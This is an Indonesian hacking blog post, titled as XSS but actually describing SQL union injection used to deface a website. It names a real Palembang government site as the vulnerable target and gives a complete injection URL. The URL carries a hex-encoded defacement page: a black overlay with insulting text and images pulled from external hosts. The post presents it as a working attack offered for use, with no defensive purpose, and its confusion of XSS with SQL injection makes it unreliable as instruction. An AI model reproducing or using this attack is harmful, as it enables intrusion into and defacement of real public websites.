#39 XSS Injection


XSS Injection

Tau XXS kan, XSS adalah merubah tetapi tidak berubah 

dalah kasus ini di perlukan bugs sqli yg versi brp aja 4-5

sebenernya ini tehnik menipu, tapi XSS sangat berguna buat Fake Page

 

1.siapkan target yg vuln sql , contoh : http://www.unitkerja.palembang.go.id/depan/pertanian/home.php?modul=6&pid=-19+union+select+1–

2.d union ke 1 kan terdapat bugs sql nya, jadi yg angka 1 itu kita sisipkan code halaman deface kita yg sudah di hex decimal di :http://tryer.t35.com/ascii.htm

merah : yg di paste ke urp
hitam: script deface kita

3.jgn lupa yg angka 1 di sisipin 0x

4.dan hasil akhir nya ya

http://www.unitkerja.palembang.go.id/depan/pertanian/home.php?modul=6&pid=-19+union+select+0x3C64697620616C69676E3D2263656E746572223E203C6469762069643D224C617965723122207374796C653D22626F726465722D7374796C653A206E6F6E653B20626F726465722D636F6C6F723A2072676228302C20302C2030292072676228302C20302C20302920626C61636B20626C61636B3B20626F726465722D77696474683A203170783B206F766572666C6F773A206175746F3B207A2D696E6465783A20313B206C6566743A203070783B2077696474683A20313030253B20706F736974696F6E3A206162736F6C7574653B20746F703A203070783B206865696768743A20313030253B206261636B67726F756E642D636F6C6F723A20626C61636B223E203C6272202F3E203C7374726F6E673E3C666F6E7420666163653D2270617079727573222073697A653D22352220636F6C6F723D22726564223E50616C656D62616E67204B6F74612053616D7061683C2F666F6E743E3C6272202F3E203C6272202F3E203C696D67207372633D22687474703A2F2F6161657A68612E636F6D2F70616C656D62616E676861636B65726C696E6B2E6F72672F4C6F676F2F322E706E672220616C743D2222202F3E3C6272202F3E20203C666F6E7420666163653D2270617079727573222073697A653D22352220636F6C6F723D22626C7565223E506F6C6973686974207461692070756B692C2067756265726E75722063656B63752C20706F6C7070206D616D62752070756B692C206B6F727570746F7220616E6A696E672C203C6272202F3E3C62723E3C62723E3C696D67207372633D22687474703A2F2F696D67332E696D616765736861636B2E75732F696D67332F363133392F6861636B712E6769662220616C743D2222202F3E3C6272202F3E203C666F6E7420666163653D2270617079727573222073697A653D22352220636F6C6F723D2267726579223E3C2F666F6E743E3C6272202F3E203C666F6E742073697A653D22332220636F6C6F723D22726564223E4C657061732053616A612047654C6172204C756D62756E6720456E65726769204B616C6175204B616D69204D61736968204B656C61706172616E3C2F666F6E743E3C2F666F6E743E3C2F7374726F6E673E203C2F6469763E203C2F6469763E–

Ichito-Bandito

 

2 thoughts on “#39 XSS Injection

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s